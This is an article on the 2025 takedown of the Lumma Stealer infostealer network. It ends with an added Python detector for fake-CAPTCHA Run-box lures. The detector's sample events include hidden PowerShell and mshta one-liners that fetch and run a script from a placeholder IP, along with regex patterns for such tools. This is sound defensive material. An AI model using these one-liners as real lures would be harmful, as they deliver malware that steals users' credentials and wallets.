Microsoft, in collaboration with global law enforcement, dismantled the Lumma Stealer malware network in May 2025. Between March 16 and May 16, 2025, Microsoft identified more than 394,000 Windows devices infected with Lumma. Lumma Stealer, sold as Malware-as-a-Service (MaaS) on underground forums since 2022, had become a favored tool for cybercriminals.
The malware was used to steal login credentials, credit card numbers, and cryptocurrency wallet data. Microsoft obtained a court order to take down approximately 2,300 malicious domains supporting Lumma's infrastructure. The U.S. Department of Justice seized control of Lumma's core command system and disrupted the marketplaces where the tool was sold.
International cooperation was crucial in the takedown. Japan's Cybercrime Control Center (JC3) facilitated the suspension of locally based Lumma infrastructure. Europol assisted in actions against hundreds of domains. This joint action is designed to slow down cybercriminals, making it challenging for them to rebuild their infrastructure.
To protect against infostealer malware, users should be skeptical of CAPTCHA or "verify you are human" prompts, especially any that ask them to press key combinations or paste a command into a Run box or terminal, and should use reputable antivirus software. Enabling two-factor authentication and keeping devices updated are also crucial steps. Microsoft's takedown of Lumma Stealer is a significant victory in combating data breaches fueled by infostealers.
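The fake-CAPTCHA lure mentioned above works by getting the victim to paste a one-liner into the Windows Run box (Win+R), which makes explorer.exe the parent of a hidden PowerShell or mshta process that fetches the stealer. The following detector is an added example written for this page, not code from Microsoft or any of the agencies named; it runs a heuristic over constructed, tab-separated process-creation records (Sysmon Event ID 1 / Security 4688 style fields) and flags the parent/child pair plus command-line pattern that a pasted lure produces. The field names, the launcher list, the scoring threshold and the sample events (including the 198.51.100.7 documentation address) are all assumptions made for the example.

```python
import re
from typing import Dict, List

# Binaries a pasted Win+R one-liner typically lands in (hypothetical list for this example).
LAUNCHER_BINARIES = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe", "certutil.exe"}

# Command-line fragments that distinguish a hidden, downloading one-liner from an
# interactive shell a user opened deliberately. Each matching pattern adds one point.
SUSPICIOUS_PATTERNS = [
    re.compile(r"-w(indowstyle)?\s+h(idden)?", re.I),                     # hidden window
    re.compile(r"\b(iex|invoke-expression)\b", re.I),                      # execute fetched text
    re.compile(r"\b(iwr|invoke-webrequest|downloadstring|curl|certutil)\b", re.I),  # fetch
    re.compile(r"https?://", re.I),                                        # remote payload
    re.compile(r"not a robot|captcha|verif", re.I),                        # lure text pasted along
]

# Constructed sample events for this example; one record per line, fields separated by tabs.
SAMPLE_EVENTS = [
    # 1: pasted ClickFix-style lure, hidden PowerShell pulling a script (should be flagged)
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -w hidden -c \"iex (iwr 'http://198.51.100.7/verify.txt')\" # I am not a robot",
    # 2: mshta variant fetching an HTA (should be flagged)
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\mshta.exe"
    "\tCommandLine=mshta http://198.51.100.7/captcha.hta",
    # 3: user opened PowerShell from the Start menu (benign)
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell.exe -NoExit -Command Get-Date",
    # 4: service host spawned by services.exe (benign, wrong parent)
    "ParentImage=C:\\Windows\\System32\\services.exe\tImage=C:\\Windows\\System32\\svchost.exe"
    "\tCommandLine=svchost.exe -k netsvcs -p",
    # 5: browser launched from the desktop with a URL (benign, not a launcher binary)
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Program Files\\Mozilla Firefox\\firefox.exe"
    "\tCommandLine=\"C:\\Program Files\\Mozilla Firefox\\firefox.exe\" https://www.example.com",
]


def parse_event(line: str) -> Dict[str, str]:
    """Split a tab-separated Key=Value record into a dict (values may contain '=')."""
    fields: Dict[str, str] = {}
    for part in line.split("\t"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_command_line(cmdline: str) -> int:
    """Number of suspicious patterns present in the command line."""
    return sum(1 for pattern in SUSPICIOUS_PATTERNS if pattern.search(cmdline))


def is_clickfix_candidate(event: Dict[str, str], threshold: int = 2) -> bool:
    """True when explorer.exe spawned a launcher binary with a lure-like command line.

    Requiring at least two pattern hits avoids flagging a user who simply opens
    PowerShell or runs a single plain command from the Run box.
    """
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent != "explorer.exe" or child not in LAUNCHER_BINARIES:
        return False
    return score_command_line(event.get("CommandLine", "")) >= threshold


def detect(lines: List[str]) -> List[str]:
    """Return the command lines of all events that look like a pasted fake-CAPTCHA lure."""
    flagged = []
    for line in lines:
        event = parse_event(line)
        if is_clickfix_candidate(event):
            flagged.append(event.get("CommandLine", ""))
    return flagged


if __name__ == "__main__":
    for cmd in detect(SAMPLE_EVENTS):
        print("FLAGGED:", cmd)
```

On the sample records only events 1 and 2 are flagged. In a real investigation the pasted text also survives in the per-user RunMRU registry key, so an analyst can corroborate a hit from process telemetry against what the victim actually typed into the Run box.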